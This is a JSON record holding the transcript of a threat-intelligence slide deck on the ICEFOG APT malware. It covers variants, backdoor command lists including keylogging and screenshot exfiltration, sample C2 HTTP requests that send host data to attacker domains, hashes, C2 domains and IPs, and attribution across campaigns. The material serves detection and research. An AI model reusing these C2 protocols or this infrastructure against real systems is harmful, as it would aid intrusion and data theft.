{ "id": "722f83c4-e853-458d-91b4-cd893f56cc05", "created_at": "2026-04-06T00:11:47.002919Z", "updated_at": "2026-04-10T03:37:54.311807Z", "deleted_at": null, "sha1_hash": "530c04eb6369ec8a5f433e970deaea34b79d0570", "title": "Into the Fog - The Return of ICEFOG APT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 114942, "plain_text": "Into the Fog - The Return of ICEFOG APT\r\nArchived: 2026-04-05 14:35:57 UTC\r\nTranscript\r\n1. *OUP-UIF'PH-m 5IF-3FUVSO-PG *$\u0026'0( \"15 Chi-en (Ashley) Shen Senior\r\nResearcher\r\n2. WHOIS • Chi En Shen (Ashley) • Senior Researcher at\r\nFireEye Global Intelligence Collection and Research Team. • Co-founder of HITCON GIRLS security\r\ncommunity in Taiwan • Review board of Black Hat Asia, Blue Hat Shanghai, Hack in the Box • First time\r\nlog in to Poland :D\r\n3.\r\n4. What is ICEFOG (aka Fucobha) ? • Kaspersky 2013 Report\r\n- The Icefog APT: A Tale of Cloak and Three Daggers. • A malware used in the campaigns targeted US, JP,\r\nTW and KR between 2011 – 2013. • Now ICEFOG is referred as a Malware family, a report, sometimes\r\nreferred as a group. (is it?)\r\n5. The ICEFOG Campaign Return? • Last public report in 2013\r\nand 2014. • No public reporting on the new ICEFOG campaign after 2014. What happened between these 5\r\nyears? • The samples discovered recently has changed the target scope. Is this the same group as in 2013? •\r\nGoal: find out what happened between these 5 years and find out who are using ICEFOG. Release of\r\nICEFOG report Blog about Java version ICEFOG. 2013 2014 2019 ?????????????????????????\r\n?????????????????????????\r\n6. Why Do We Care?\r\n7.\r\n8.\r\n9. ICEFOG Variants (\u003c2014) Old ICEFOG ICEFOG Type 1 ICEFOG Type\r\n2 ICEFOG Type 3 \u0026 4 (No sample) ICEFOG-NG ICEFOG OSX (aka Macfog) ICEFOG Java (aka\r\nJavafog) Support platform Windows Windows Windows (shellcode \u0026 standalone) Windows Windows Mac\r\nOSX Java Support Functions • upload_ • download_ • Cmd_ • code_ • upload_ • download_ • Cmd_ •\r\ncode_ • upload_ • download_ • Cmd_ • Code_ Unknown • Cmd • Download • Upload • sleep • upload_ •\r\ndownload_ • Cmd_ • code_ • upload_ • cmd_Update Domain • cmd_ Communication Method\r\nCommunicate with emails Communicate with C\u0026C server with “.aspx” scripts Script based proxy server\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 1 of 10\n\nC\u0026C server with scripts named “view.asp”, “update.asp”, “upfile.asp” TCP connection to port 5600\r\nCommunicate with C\u0026C server with “.aspx” scripts Communicate with C\u0026C server with “.aspx” scripts\r\n10.\r\n11.\r\n12. The CVE2017-11882 Exploit Template • Also, great research from Anomali.\r\n• https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do- chinese-and-indian-apts-have-a-shared-supply-chain Shellcode decode routine Open Document Encoded (0xFC) Dropper (8.t)\r\nDrops into %temp% Shellcode decode \u0026 execute Malware Can be hunted by the RTF Object Dropper\r\n13. The Shared Exploit Builder • CVE 2017-11882 exploit template. •\r\nActually, shared among at least 3 different groups. (APT40, Conimes team aka Goblin Panda, ICEFOG\r\nOperators) Threat Group Hash Malware Create Date Author Targeted Region APT40\r\nd5a7dd7441dc2b05464a21dd0 c0871ff BEACON 2017-12-07 08:17:00 Windows User USA\r\nTemp.CONIMES f223e4175649fa2e34271db8c9 68db12 TEMPFUN 2018-01-15 14:47:00 Windows User\r\nLAO Temp.CONIMES 07544892999b91ae2c9280d8e e3c663a TEMPFUN 2018-01-17 09:04:00 Windows\r\nUser VNM Temp.CONIMES 45a94b3b13101c932a72d89ff 5eb715a TEMPFUN 2018-01-31 11:24:00\r\nWindows User VNM ICEFOG Operator 46d91a91ecdf9c0abc7355c4e7 cf08fc ICEFOG 2018-02-22\r\n20:07:00 T TUR ICEFOG Operator 80883df4e89d5632fa72a8505 7773538 ICEFOG 2018-02-22 20:07:00\r\nT KZ, RU\r\n14.\r\n15. ICEFOG-P (New) Command Description cmd_ Execute the command received from\r\nC\u0026C download_ Download file from specified URL filelist_ Obtaining the list of files within specified\r\nfolder. upload_ File loading from the server to computer. delete_ Delete specified file rename_ Move file to\r\nspecified location newdir_ Create specified directory beforecontinuefile_ Reset connection to the server\r\ncontinuefile_ Resume the file download from the server. exit_ Terminate Process. transover_ Termination\r\nof current thread. screen_ Send screenshot to C\u0026C server. key_ Send keylogger’s log file to C\u0026C disklist_\r\nSetting monitored folders disklog_ Upload monitored folder’s data code_ (removed) run code from file to\r\nmemory New supported commands Gentle reminder for entering the main function 20130505 Check if\r\nsystem date \u003c 20130505 Anti- sandbox?\r\n16. ICEFOG-P (New) POST /upload.aspx?filepath=info\u0026filename=\u003chostname\u003e_\u003cMAC\r\naddress\u003e.jpg HTTP/1.1 User-Agent: Internet Explorer Host:\r\nfoo.com Content-Length: 862 Cache-Control: no-cache HOST NAME:WINDOWS7 USER NAME:user\r\nOS Version: Microsoft Windows 7 x86 Service Pack 1 (Build 7601) CPU: GenuineIntel Intel64 Family 6\r\nModel 142 Stepping 9 0MHZ Physical memory: Total physical memory:1023MB,Available\r\nmemory:388MB Windows Directory: C:\\\\Windows System Directory: C:\\\\Windows\\\\system32 Hard Disk:\r\nC:\\\\ (NTFS) CD-ROM Disk: D:\\\\ Disk space: Total disk space:39G,The remaining disk space:15G POST\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 2 of 10\n\n/news/upload.aspx?filepath=ok\u0026filename=\u003cho stname\u003e_\u003chost IP\u003e.jpg HTTP/1.1 Host:\r\nicefog.8.100911.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language:\r\nen-us Content-Type: multipart/form-data Accept-Encoding: gzip, deflate Connection: Keep-Alive Cache-Control: no-cache User-Agent: MyAgent Content-Length: 0 Traffic of ICEFOG-P Traffic of ICEFOG Type\r\n1 Adds physical machine information likely for filtering out sandbox or analysis environment\r\n17.\r\n18.\r\n19. ICEFOG-M (The latest) • Supports same functions as ICEFOG–P. •\r\nCommunication changed to HTTPS via port 443. • Payload became file-less (stored in registry), applied a\r\ncustomized loader launched by benign loader (DLL hijacking). • Loads an external sqlite3.dll library.\r\nEncrypted ICEFOG payload stored in registry\r\n20. PDB in ICEFOG PDB Associated ICEFOG Variant\r\nE:\\zc\\HTTPS\\HTTPS\\86AuthenticateProxy\\ExeLoader\\Release\\RasTls.pdb ICEFOG-P\r\nC:\\Users\\apper\\Desktop\\86AuthenticateProxy(copy)\\ExeLoader\\Release\\RasTls.pdb\r\nICEFOG-P C:\\0426\\86AuthenticateProxy\\ExeLoader\\Release\\RasTls.pdb ICEFOG-P C:\\Documents and\r\nSettings\\Administrator\\Desktop\\86AuthenticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb ICEFOG-P D:\\vvvvv\\downloadccc0301\\chen_http0301\\source\\Server\\64\\ExeLoader\\x64\\Release\\linkinfo.pdb\r\nICEFOG-P F:\\worktmp\\2014.11.05\\ff\\Server\\86AuthenticateProxy\\ExeLoader\\Release\\linkinfo.pdb\r\nICEFOG-P • e:\\jd4\\myServer(RegRun)\\release\\jd4(reg).pdb •\r\ne:\\jd4\\myServer(RegRun)\\release\\jd4(reg).pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\nx:\\jd(RegRun)\\release\\jd3(reg).pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\ne:\\6.26\\myServer\\release\\myServer.pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\nC:\\Users\\yang.zc\\Desktop\\代码片调用程序 4\\Release\\UCCodePieceGo.pdb • D:\\Undercurrent\\服务端\\代\r\n码片服务端\\过UAC版本\\专用代码片调用程序 \\Release\\UCCodePieceGo.pdb ICEFOG Type 1 ICEFOG\r\nType 2 \u003c 2013 ICEFOG Samples \u003e 2013 More developers?\r\n21. MacOS X ICEFOG (aka MacFog) • Among all the samples\r\nwe collected, some are the MacOS X MachO executable files. • The MacOS X ICEFOG was first\r\ndistributed in Chinese forums, forged as image process software. • Newly uploaded old samples, having the\r\nsame default C\u0026C setting. • Only one new sample with a private IP setting (testing?).\r\n22.\r\n23.\r\n24. How to determine the timeframe of the sample? • When\r\nwe found the sample after the campaign finished. • Consider: • PDNS time • Domain create date • Compile\r\ntimestamp (dropper? Payload? Wrapper?) • Exploit document last saved time (template?) • Decoy\r\ndocument timestamp • Date sample was first seen in the wild • PDB Sample Sample First Seen in the wild\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 3 of 10\n\nExploit Doc Last saved date Dropped Malware Compile Date C\u0026C Domain Passive DNS First Seen\r\nDecoy File Last Modifed date c3ed6b34707e 92f7aa35859a 9647f044 2017-08-03 10:48:09 2014/04/11\r\n0:00:00 2016-09-27 02:23:30 2017-08-03 2018-02-26 2017-08-02 19:17:00\r\n25.\r\n26.\r\n27.\r\n28.\r\n29.\r\n30. 2014 Samples Targets KZ and RU 2015 Attack Target an\r\nAgriculture Company in Europe 2016 2017 2019 Campaign Timeline Sample target potentially Russia\r\nTOPNEWS Campaign APPER Campaign Sample target Tajikistan Sample targets KZ 2018\r\nWATERFIGHT Campaign WATERFIGHT Campaign\r\n31. Attack targeted Agriculture Company in Europe (2015) • 64 bit\r\nICEFOG-P found in the compromised environment. • Persistent attack started from 2011. • Actor mainly\r\nused SOGU and FUNRUN backdoor to gain initial access. • Also, found VICEROY backdoor, which has\r\nbeen used by APT9. • We also found malware connects to APT10 infrastructure. • The ICEFOG backdoor\r\nfound at the scene was a customized version.\r\n32.\r\n33. • Campaign targets Mongolia and Russia, suspected media, finance and\r\ngovernment. • Sample delivered by spear-phishing email. • The ICEFOG samples are all ICEFOG-P\r\nvariant. • Some samples includes suspected campaign code information. Hash Compile Timestamp Drop\r\nby C\u0026C PDB Campaign Code eb2d297d099f3d39874 efa3f89735a01 2015/03/12 10:18:13\r\nf8cc15db9c85da19555a7232 b543c726 dnservers.itemdb.com russion.dnsedc.com C:\\Documents and\r\nSettings\\Administrator\\Desktop\\8 6AuthenticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb 02-03\r\nc7d2c170482d17e2e76 e6937bd8ab9a5 2015/05/14 5:11:42 B3EFDA0E130373DAF6CB17 801714B66F\r\n(rarsfx) bulgaa.sportsnewsa.net C:\\0426\\86AuthenticateProxy\\Exe Loader\\Release\\RasTls.pdb 120\r\n7dc1f0e60f11c456aa15 cc3546716c17 2015/05/14 6:11:42 e84b74f07ae803852f2ed194 58a1539d\r\n(tsalin.docx.exe) 74583d7355113ad3e58e355 b003083e5 (winword.scr) zaluu.dellnewsup.net\r\nC:\\0426\\86AuthenticateProxy\\Exe Loader\\Release\\RasTls.pdb 100 09d8f865bccfb239afab 4f4f564081ff\r\n2016/09/27 3:23:30 47713144ae08560ba939ea01 620a0a2d (toot.docx .exe) zaluu.dellnewsup.net\r\nE:\\zc\\HTTPS\\HTTPS\\86Authentic ateProxy\\ExeLoader\\Release\\Ras Tls.pdb b 2015 TOPNEWS\r\nCampaign\r\n34.\r\n35. 2015 TOPNEWS Campaign Hash Malware Family Compile timestamp C\u0026C Target\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 4 of 10\n\n664318c95c4a48debd3562e a602796b9 TEMPFUN 2014-07-23 12:44:56 win.dellnewsup.net\r\na489f2b4505b8f291804e393 1cf16ed8 TEMPFUN 2014-07-23 12:44:56 win.dellnewsup.net MN\r\n2e74505cc08c0d0d88146d4 6915f37af SOGU 2015-02-06 02:56:28 mn.dellnewsup.net\r\nnews.dellnewsup.net MN a0389879ea435e647d29f69 66b1d601f FUNRUN 2015-02-07 09:34:05\r\ndate.dellnewsup.net 1a93c0257f52e2b1e8e4f52c 033a61b3 SOGU 2011-03-02 07:40:24 dwm.dnsedc.com\r\nRU • The domain “dellnewsup.net” has 13 sub-domains. • Pivoting these sub-domains, we found other\r\nmalwares connected to the infrastructure. • Campaign also leveraged SOGU, TEMPFUN and FUNRUN to\r\nattack Mongolian targets from 2014 to 2015.\r\n36. 2015 TOPNEWS Campaign • Domains registrant email linked to the\r\nRoaming Tiger group and rotten tomato campaign. dellnewsup.net sportsnewsa.net dnsedc.com\r\ndnsqaz.com systemupdate5.dtdns.net transactiona.com googlenewsup.net futuresgolda.com\r\ngoogltrend.com financenewsu.net micronewsup.net dellindustry.com newsupdatea.net…… More\r\nyuminga1@126.com http://2014.zeronights.org/assets/files/slides/roaming_tiger_zeronights_2014.pdf\r\nRoaming Tiger Campaign\r\n37.\r\n38. 2016 APPER Campaign • Pivoting the C\u0026C infrastructure, we found\r\n8 related ICEFOG-P samples suspected of being used in the same campaign. • Same PDB strings in the\r\nsamples suggest a possible developer “apper”. Hash Compile Timestamp C\u0026C Campaig n code pdb\r\naae3e322 dbe5bb18 94a412ca 08afdf03 2016/05/22 10:35:41 ddns.epac.to cyexy\r\nC:\\Users\\apper\\Desktop\\86Authe nticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb e28c2d68\r\na6f13e81d 32171288 8c89e52 2016/05/19 8:26:23 ddns.epac.to (45.125.13.1 99) cyexy\r\nC:\\Users\\apper\\Desktop\\86Authe nticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb 0e25aa79\r\n1c911910 8af073bc9 e9d0fa2 2016/05/10 9:24:38 45.125.13.1 99 dxx C:\\Users\\apper\\Desktop\\86Authe\r\nnticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb a4dc9763 d296c45a 846156f0 2479ecde\r\n2016/05/10 8:49:45 45.125.13.1 99 ghj C:\\Users\\apper\\Desktop\\86Authe nticateProxy(copy)\r\n\\ExeLoader\\Release\\RasTls.pdb a9ecf6d26 74443cda c067b136 b04c7d0 2016/03/21 4:20:25 poff.wha.la\r\nsoums C:\\Users\\apper\\Desktop\\86Authe nticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb 404b1b78\r\nb4f34612e 61d4af3bf 5083f1 2016/03/21 4:20:25 poff.wha.la soums C:\\Users\\apper\\Desktop\\86Authe\r\nnticateProxy(copy) \\ExeLoader\\Release\\RasTls.pdb a78212faa 38ef1078b 300a4929 97fc02\r\n2016/03/21 4:20:25 poff.wha.la soums \\Users\\apper\\Desktop\\86Authent icateProxy(copy)\r\n\\ExeLoader\\Release\\RasTls.pdb 118.193.228.32 zorsoft.ns1.name tajikstantravel.dynamic-dns.net\r\ncospation.net poff.wha.la mitian123.com mocus.cospation.net cospation.net\r\n39. 2018 The WATERFIGHT CAMPAIGN Hash File name Exploit Default codepage\r\nCreation Date Last Modified Author Last modify by 9ca6d45643f89bf233f0 8b7d74910346 Address Book\r\n2018.doc CVE-2017-11882 Western European 2018/02/22 20:07:00 2018/02/22 20:08:00 T T\r\nd00a34baad19d40dcefb adb0942a2e4d WorkPlan.doc CVE-2017-11882 Western European 2018/02/22\r\n20:07:00 2018/02/22 20:08:00 T T 88d667cc01c4d8ee32e 9de116f3bfdeb AMU_SLA_Agreement_Fin\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 5 of 10\n\nal_Dt_20-Spr_14.doc CVE-2017-11882 Simplified Chinese 2018/02/22 20:07:00 2018/03/14 17:34:00 T\r\nAdministrator 46d91a91ecdf9c0abc73 55c4e7cf08fc katılımcılar listesi.doc CVE-2017-11882 Western\r\nEuropean 2018/02/22 20:07:00 2018/02/22 20:08:00 T T 80883df4e89d5632fa72 a85057773538\r\nВнутренняя опись документов AGAT.doc CVE-2017-11882 Western European 2018/02/22 20:07:00\r\n2018/02/22 20:08:00 T T 7fa8c07634f937a1fcef9 180531dc2e4 счет.doc CVE-2017-11882 Simplified\r\nChinese 2017/05/22 11:52:00 2017:05:22 11:52:00 Windows Windows e7c5307691772a058fa\r\n7d9e8ea426a59 Задание.doc CVE-2017-11882 Simplified Chinese 2017/05/22 11:52:00 2017:05:22\r\n11:52:00 Windows Windows 63f9eaf7a80231480687 b134b1915bd0 Российский фигурист выиграл\r\nзимние Олимпийские игры PyeongChang в Южной Корее.doc CVE-2017-11882 Simplified Chinese\r\n2017/05/22 11:52:00 2017:05:22 11:52:00 Windows Windows • Campaign targeted suspected water source\r\nprovider, banks and government. • Targeted countries include Turkey, India, Kazakhstan, Uzbekistan and\r\nTajikistan.\r\n40. 2018 The WATERFIGHT CAMPAIGN Leveraged the shared exploit template\r\n41. 2018 The WATERFIGHT CAMPAIGN • Exploit document ICEFOG-P samples. •\r\nC\u0026C domain and file name shows interest in a water source company in Uzbekistan. • Compiled a lot\r\nsamples in 2 days Hash Compile date Drop by C\u0026C Campaign code 4178d9b22efe7044540043b5c770b6a\r\na 2018/02/24 5:20:16 9ca6d45643f89bf233f08b7d74910346 tele.zyns.com umde\r\n1c2d4c95c1b4e9d5193423719a7bb07 5 2018/02/23 8:13:20 d00a34baad19d40dcefbadb0942a2e4d\r\nuzwatersource.dynamic-dns.net osbc 71e5b89d5a804ddbe84fa4950bf97ac7 2018/02/26 11:58:57\r\n88d667cc01c4d8ee32e9de116f3bfdeb trendiis.sixth.biz hgmpy 6fffdb88292eeed0483b4030e58f401e\r\n2018/02/23 8:13:20 46d91a91ecdf9c0abc7355c4e7cf08fc uzwatersource.dynamic-dns.net osbc\r\n6850e553445c0c9eac3206331eb0429 b 2018/02/23 9:44:25 80883df4e89d5632fa72a85057773538\r\nlaugh.toh.info jkmsy d5c67718e35bd1083dd50335ba9e89d a 2018/02/23 8:44:25\r\n7fa8c07634f937a1fcef9180531dc2e4 laugh.toh.info jkmsy 9344e542cc1916b9ddb587daa70f065 2\r\n2018/02/23 9:35:38 e7c5307691772a058fa7d9e8ea426a59 aries.epac.to gskv\r\nc2893fefcadbc7fed4fe74ea56133901 2018/02/23 14:49:58 63f9eaf7a80231480687b134b1915bd0\r\nkastygost.compress.to msxdg\r\n42. 2018 PHKIGHT Campaign • On April 26, 2018, our appliance\r\ndetected ICEFOG traffic from out of the Philippines. • We also found the traffic of ICEFOG from the\r\nscanned URL on a public scanning service. The timestamp indicates that this campaign was likely still\r\nongoing in July and October 2018: POST /Home/upload.aspx?filepath=*\u0026filename=* HTTP/1.1 User-Agent: Internet Explorer Host: yahzee.eyellowarm.com:443 Content-Length: 908 Connection: Keep-Alive\r\nCache-Control: no-cache\r\n43. 2018 PHKIGHT Campaign • Investigating the C\u0026C domain “eyellowarm.com”, we\r\nfound two other sub- domains: • news.eyellowarm.com • meal.eyellowarm.com • The domain\r\n“news.eyellowarm.com” is connected by an ENDCMD (aka (Hussarini, Sarhust) malware, which we have\r\nobserved in APT15’s (aka Social Network Team) campaign. Hash filename Malware Compile Timestamp\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 6 of 10\n\nC\u0026C e5bdc78c686e15dfeed6696b cd5989c3 NvSmartMax.dll ENDCMD 2010-12-19 04:51:39\r\nnews.eyellowarm.com Note that although the sample has the compile timestamp in 2010, it is observed in\r\nthe wild in 2018 and the C\u0026C remains active during our analysis in 2018.\r\n44. 2018 PHKIGHT Campaign • Correlated (through passive DNS) infrastructure show\r\nstrong interest in the Philippines. - www.benzerold.com - ph4.01transport.com - news.eyellowarm.com -\r\ndurian.appleleveno.com - adove.benzerold.com - benzerold.com - mailback.benzerold.com -\r\nph2.01transport.com - phldt.appleleveno.com - yahzee.eyellowarm.com - mecaf.benzerold.com -\r\nipad.appleleveno.com - course.appleleveno.com - well.suverycool.com - pldt.benzerold.com -\r\nwww.knightpal.com - banana.appleleveno.com - appleleveno.com - node-ph-mnl2.kyssrcd.pw -\r\nisafp.numnote.com - ph1vip.blue-vpn.net - news.numnote.com - news.kaboolyn.com - topic.numnote.com\r\n- dns01.comesafe.com - is01.knightpal.com - eyellowarm.com - news.yahzee.eyellowarm.com -\r\nkaboolyn.com - dns1.kaboolyn.com - yahzee.yahzee.eyellowarm.com - ds03.numnote.com -\r\nmeal.eyellowarm.com - message.benzerold.com - pop3.numnote.com - afp1.kaboolyn.com -\r\ntrans.numnote.com - usiszero.benzerold.com - numnote.com - pldt.knightpal.com - ph1.numnote.com -\r\nns1.01transport.com - pldtcon.knightpal.com - afp1.knightpal.com - appdata.appleleveno.com -\r\nns2.01transport.com - ns01.knightpal.com - ph.01transport.com - support.numnote.com -\r\nph1.01transport.com - knightpal.com - pnoc1.numnote.com - 01transport.com\r\n45. 2018 PHKIGHT Campaign Hash Malware family filename Compile Timestamp C\u0026C\r\nPDB string 4f11e00b015047642d8 ddc306fc90da0 ENDCMD NvSmartMax.dl l 2010-12-19 04:51:39\r\nnews.eyellowarm.com C:\\Users\\Sun\\Desktop \\new_test\\NvSmart\\R elease\\NvSmart.pdb\r\n1554900f889c9498c43c 9f875eceea38 MIRAGE netsh.exe 2013-06-28 09:27:57 pldtcon.knightpal.com\r\n7b8c955a0f1d6d37833 277849a070e37 ENDCMD Outllib.dll 2016-07-06 02:50:18 well.suverycool.com\r\n92853e0506ea16c6f17a c32f5ef8f3b3 ENDCMD Outllib.dll 2015-08-27 07:52:36 ipad.appleleveno.com\r\n4f11e00b015047642d8 ddc306fc90da0 ENDCMD Outllib.dll 2015-08-27 07:52:36\r\ndurian.appleleveno.com 86409708eb0c716858e a30ae15eb7d47 ENDCMD N/A 2010-12-19 04:53:10\r\nnews.kaboolyn.com C:\\Users\\Sun\\Desktop \\new_test\\NvSmart\\R elease\\NvSmart.pdb Malware Connected\r\nto the Correlated Domains • ENDCMD and MIRAGE malware were exclusively observed used by APT15\r\n(aka Social Network team). The targets, malware and TTP all align with the profile of APT15.\r\n46. 2019 SKYLINE Campaign • Observed the ongoing campaign that likely\r\ntargeted Turkey and Kazakhstan in 2019. • The timestamp suggests the campaign might have started from\r\n2018. • Leveraged CVE 2017-11882 shared exploit template with ICEFOG-M, no payload timestamp.\r\nHash filename Exploit Code Page Create Date Last modify date Author Last modify by\r\n30528dc0c1e123dff51f 40301cc03204 Unknown CVE-2018- 0802 Western European 2018/04/23 1:01:00\r\n2018/04/2 3 1:01:00 T T 4642e8712c8ada8d56b d36416abb4808 doc.rtf CVE-2017- 11882 N/A N/A N/A\r\nN/A N/A c65b73dde66184bae6e ad97afd1b4c4b doc20190301018.doc CVE 2017- 11882 Western\r\nEuropean 2018/04/23 1:01:00 2018/04/2 3 1:01:00 T T\r\n47.\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 7 of 10\n\n48.\r\n49. 2019 SKYLINE Campaign • Two observed loaders Hash Compile Timestamp\r\nDrop by Observed Connected C\u0026C 0b86cc8e56a400f1adeb1e 7b6ebe6abe 2018/12/10 14:31:47\r\n4642e8712c8ada8d56bd36416abb480 8 nicodonald.accesscam.org c6a73e29c770065b4911ef 46285d6557\r\n2018/04/27 3:49:31 30528dc0c1e123dff51f40301cc03204 c65b73dde66184bae6ead97afd1b4c4b\r\nskylineqaz.crabdance.com xn— ylineqaz-y25ja.crabdance.com youareexcellent.kozow.com xn--\r\nuareexcellent-or3qa.kozow.com\r\n50. ICEFOG-M (The latest) POST /upload.aspx?filepath=info\u0026filename==\r\n\u003chostname\u003e_\u003cMAC address\u003e HTTP/1.1 User-Agent: Internet Explorer\r\nHost: foo.com Content-Length: 862 Cache-Control: no-cache HOST NAME:WINDOWS7 USER\r\nNAME:user OS Version: Microsoft Windows 7 x86 Service Pack 1 (Build 7601) CPU: GenuineIntel\r\nIntel64 Family 6 Model 142 Stepping 9 0MHZ Physical memory: Total physical\r\nmemory:1023MB,Available memory:388MB Windows Directory: C:\\\\Windows System Directory:\r\nC:\\\\Windows\\\\system32 Hard Disk: C:\\\\ (NTFS) CD-ROM Disk: D:\\\\ Disk space: Total disk\r\nspace:39G,The remaining disk space:15G Group : tttt1 Added Group ID in traffic 20130505 20130601\r\nUpdated the compared Date\r\n51. Who Are The Actor Behind These Campaigns?\r\n52.\r\n53. Targeting Country: UZ, MN, MY, RU, BY, KZ, US, Tibet,\r\nUA Targeting Industry: Gov, Oil and Gas, Aerospace, Defense Malware: SOGU, GHOST, TEMPFUN,\r\nFIRSTBLOOD, PI. Roaming Tiger Targeting Country: PH, VN, TW, US, UK, IT, PL, UN, SG, NATO\r\nTargeting Industry: Gov, Political party Malware: ENFAL, ENDCMD, QUICKHEAL, SOGU, CYFREE,\r\nMIRAGE, NOISEMAKER, QUICKHEAL, SWALLOWFLY APT15 Targeting Country: HK, US, SG, MY,\r\nJP, IN, KR, TH, TW Targeting Industry: Aerospace, Agriculture, Construction, Energy, Healthcare, ,High\r\nTech, Media, Transportation Malware: BIGJOLT,FUNRUN,GH0ST,HOMEUNIX,JIM\r\nA,PHOTO,POISON IVY,SKINNYGENE,SOGU,VICEROY,VIPSH\r\nELL,WETHEAD,XDOOR,ZXSHELL APT9\r\n54. What About Other Campaigns?\r\n55.\r\n56. eagleoftajik.dynamic-dns.net ICEFOG-P (0c410d22265 dece807193bf 8a47fd91f ) ICEFOG-P (e28c2d68a6f1 3e81d3217128 88c89e52)\r\nWATERFIGHT Campaign Target Tajikistan 45.125.13.199 APPER Campaign 118.193.228.32\r\nzorsoft.ns1.name tajikstantravel.dynamic-dns.net poff.wha.la SOGU (ee649cf2b4e4 0288cd1194c3\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 8 of 10\n\nda03edef ) 27.255.80.226 nitec.ns1.name SOGU (d5e8b1f836a9 199a9a176aee 007efc65 ) 103.243.24.149\r\nbluesky.zyns.com moonlight.compress.to 103.242.134.140 QUICKHEAL (5378d13965a 3499ea83d6d0\r\n371b03794 ) niteast.strangled.net whitebirds.mefound.com game.sexidude.com SOGU\r\n(d5e8b1f836a9199a9a176a ee007efc65 ) ICEFOG-P (be7ee5ae37dbf03df52 c6bfda41c6194)\r\nQUICKHEAL (E34874c27161eb563cfbdc0 0ee1334a2) WHITEBIRD (fdfcd9347c1f6f6a4daaf3f5\r\n0bc410c6) 45.252.63.244 honoroftajik.dynamic-dns.net uzwatersource.dynamic-dns.net ICEFOG-P\r\n(6fffdb88292eeed04 83b4030e58f401e) WATERFIGHT Campaign www.ddns.epac.to ICEFOG-P\r\n(a9ecf6d2674443cda c067b136b04c7d0)\r\n57. 2016 – 2017 APPER Campaign 2018 WATERFIGHT Campaign 2019 SKYLINE\r\nCampaign 2017 SOGU \u0026 QUICKHEAL targets KZ C\u0026C Infra Connected (118.193.228.32) Target TTP\r\nC\u0026C Infra Connected (103.242.132.197) C\u0026C Infra Connected (103.242.132.197) Target TTP C\u0026C Infra\r\nConnected (154.223.167.20, 45.77.134.195) 2015 Targets Tajikistan C\u0026C Infra Connected\r\n(103.242.132.197) 2014 Target KZ Target C\u0026C Infra Connected C\u0026C Infra Connected (103.242.132.197)\r\nWeak Medium Strong\r\n58. 2016 – 2017 APPER Campaign 2018 WATERFIGHT Campaign 2019 SKYLINE\r\nCampaign 2015 TOPNEWS Campaign 2017 SOGU \u0026 QUICKHEAL targets KZ C\u0026C Infra Connected\r\n(118.193.228.32) Target TTP C\u0026C Infra Connected (103.242.132.197) C\u0026C Infra Connected\r\n(103.242.132.197) Target TTP C\u0026C Infra Connected (154.223.167.20, 45.77.134.195) 2015 Targets\r\nTajikistan C\u0026C Infra Connected (103.242.132.197) Roaming Tiger Campaign 2015 Target Agriculture in\r\nEU Same PDB string 2015 Target KZ 2018 PHKNIGHT Campaign APT15 Malware C\u0026C Overlap Target\r\nC\u0026C Infra Connected Registrant Email Target TTP APT9 Malware Sample Found in victim’s environment\r\n2014 Target KZ Target C\u0026C Infra Connected C\u0026C Infra Connected (103.242.132.197) Weak Medium\r\nStrong\r\n59. Temp Group A • Active since (at least): 2014 •\r\nDelivery method: Spear-phishing email • Exploitation method: Malicious macro, RARSFX, CVE 2017-\r\n11882, CVE 2012- 0158 • Target region: Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey •\r\nMalware: ICEFOG-P, ICEFOG-M, SOGU, QUICKHEAL • Connection to other group: Uses ICEFOG-P\r\nwith the same PDB as Roaming Tiger. Targeting Country: Rum KZ, Tajikistan, UZ, TR Targeting Industry:\r\nGov, Natural resource Malware: ICEFOG-P, ICEFOG-M, SOGU, QUICKHEAL ???????\r\n60. Conclusion • ICEFOG is malware shared among Roaming Tiger, APT15,\r\nTemp Group A and suspected APT9. • Shared malware is a pitfall for attribution, we should not do\r\nattribution only based on malware. • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to\r\ntarget Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey. • With the file-less ICEFOG-M, host-based\r\ndetection for payloads are more difficult. • Continued development indicates there could be more attacks\r\nleveraging ICEFOG in future campaigns, and possibly leveraged by more attackers.\r\n61. 2\" Chi-en (Ashley) Shen Senior Researcher @ashley_shen_920\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 9 of 10\n\nSource: https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt" ], "report_names": [ "into-the-fog-the-return-of-icefog-apt" ], "threat_actors": [ { "id": "ec14074c-8517-40e1-b4d7-3897f1254487", "created_at": "2023-01-06T13:46:38.300905Z", "updated_at": "2026-04-10T02:00:02.918468Z", "deleted_at": null, "main_name": "APT10", "aliases": [ "Red Apollo", "HOGFISH", "BRONZE RIVERSIDE", "G0045", 